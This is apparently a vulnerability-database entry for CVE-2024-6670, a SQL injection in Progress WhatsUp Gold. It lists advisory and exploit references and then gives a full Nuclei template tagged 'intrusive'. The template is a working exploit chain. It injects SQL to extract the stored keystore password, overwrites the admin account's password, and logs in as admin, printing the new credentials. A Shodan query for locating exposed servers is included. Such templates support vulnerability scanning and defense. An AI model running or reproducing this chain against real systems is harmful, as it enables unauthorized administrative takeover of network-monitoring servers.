| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2024-6670 | 29 Aug 2024 00:00 | – | attackerkb |
| The vulnerability of the WhatsUp Gold network infrastructure monitoring system lies in the lack of protective measures for the SQL query structure, allowing attackers to gain unauthorized access to user data. | 16 Dec 2024 00:00 | – | bdu_fstec |
| CVE-2024-6670 | 24 Aug 2024 09:50 | – | circl |
| Progress WhatsUp Gold SQL Injection Vulnerability | 16 Sep 2024 00:00 | – | cisa_kev |
| CISA Adds Two Known Exploited Vulnerabilities to Catalog | 16 Sep 2024 12:00 | – | cisa |
| WhatsUp Gold security vulnerability | 29 Aug 2024 00:00 | – | cnnvd |
| CVE-2024-6670 | 29 Aug 2024 22:04 | – | cve |
| CVE-2024-6670 WhatsUp Gold HasErrors SQL Injection Authentication Bypass Vulnerability | 29 Aug 2024 22:04 | – | cvelist |
| Exploit for SQL Injection in Progress Whatsup_Gold | 30 Aug 2024 17:13 | – | githubexploit |
| WhatsUp Gold SQL Injection (CVE-2024-6670) | 27 Sep 2024 18:53 | – | metasploit |

```yaml
id: CVE-2024-6670

info:
  name: WhatsUp Gold HasErrors SQL Injection - Authentication Bypass
  author: DhiyaneshDK,princechaddha
  severity: critical
  description: |
    In WhatsUp Gold versions released before 2024.0.0, a SQL Injection vulnerability allows an unauthenticated attacker to retrieve the users encrypted password.
  impact: |
    Unauthenticated attackers can exploit SQL injection to retrieve encrypted user passwords, modify admin credentials, and achieve authentication bypass for full system access.
  remediation: |
    Update WhatsUp Gold to version 2024.0.0 or later to address the SQL injection vulnerability.
  reference:
    - https://github.com/sinsinology/CVE-2024-6670
    - https://community.progress.com/s/article/WhatsUp-Gold-Security-Bulletin-August-2024
    - https://www.progress.com/network-monitoring
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-6670
    cwe-id: CWE-89
    epss-score: 0.94661
    epss-percentile: 0.99846
    cpe: cpe:2.3:a:progress:whatsup_gold:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 4
    shodan-query: title:"WhatsUp Gold" http.favicon.hash:-2107233094
    product: whatsup_gold
    vendor: progress
  tags: cve,cve2024,whatsup-gold,auth-bypass,sqli,intrusive,kev,vkev,vuln

flow: |
  http(1);
  http(2);
  http(3);
  encryptedPassword = template.encryptedPassword
  const cleanedInput = encryptedPassword.replace('psyduck', '').match(/\d+/g);
  const hexValues = cleanedInput.map(value => {
    const num = parseInt(value);
    return isNaN(num) ? '00' : num.toString(16).padStart(2, '0');
  });
  log(hexValues);
  const hexString = hexValues.join('');
  const varbinaryString = '0x' + hexString;
  set("encryptedPassword", varbinaryString);
  http(4) && http(5);

variables:
  username: "admin"
  password: "{{to_lower(rand_text_alpha(8))}}"

http:
  - raw:
      - |
        POST /NmConsole/WugSystemAppSettings/JMXSecurity HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"KeyStorePassword": "{{password}}", "TrustStorePassword": "{{password}}"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(set_cookie, 'ASP.NET_SessionId=')
        condition: and
        internal: true

  - raw:
      - |
        POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE ProActiveAlert SET sAlertName='psyduck'+( SELECT sValue FROM GlobalSettings WHERE sName = '_GLOBAL_:JavaKeyStorePwd');--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(content_type, 'application/json')
        condition: and
        internal: true

  - raw:
      - |
        GET /NmConsole/Platform/Filter/AlertCenterItemsReportThresholds HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, 'DisplayName')
        condition: and
        internal: true

    extractors:
      - type: regex
        internal: true
        name: encryptedPassword
        regex:
          - '"psyduck\d+(,\d+)*"'

  - raw:
      - |
        POST /NmConsole/Platform/PerformanceMonitorErrors/HasErrors HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {"deviceId": "22222", "classId": "DF215E10-8BD4-4401-B2DC-99BB03135F2E';UPDATE WebUser SET sPassword = {{encryptedPassword}} where sUserName = 'admin';--", "range": "1", "n": "1", "start": "3", "end": "4", "businesdsHoursId": "5"}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains(body, 'false')
        condition: and
        internal: true

  - raw:
      - |
        POST /NmConsole/User/LoginAjax HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        username={{username}}&password={{password}}&rememberMe=false

    matchers:
      - type: word
        part: body
        words:
          - '"authenticated":true'
          - '"username":"'
        condition: and

    extractors:
      - type: dsl
        dsl:
          - '"USER: "+ username'
          - '"PASS: "+ password'
# digest: 4a0a00473045022100bd1969c8d4b0f125dfe170628cce94781816d6d2c4731825351b2fbe85f493690220175ee4009f55440ecf6cfa5cbda2994c642c38ce048a2fa7f92e9ac9d937f4d6:922c64590222798bb761d5b6d8e72950
```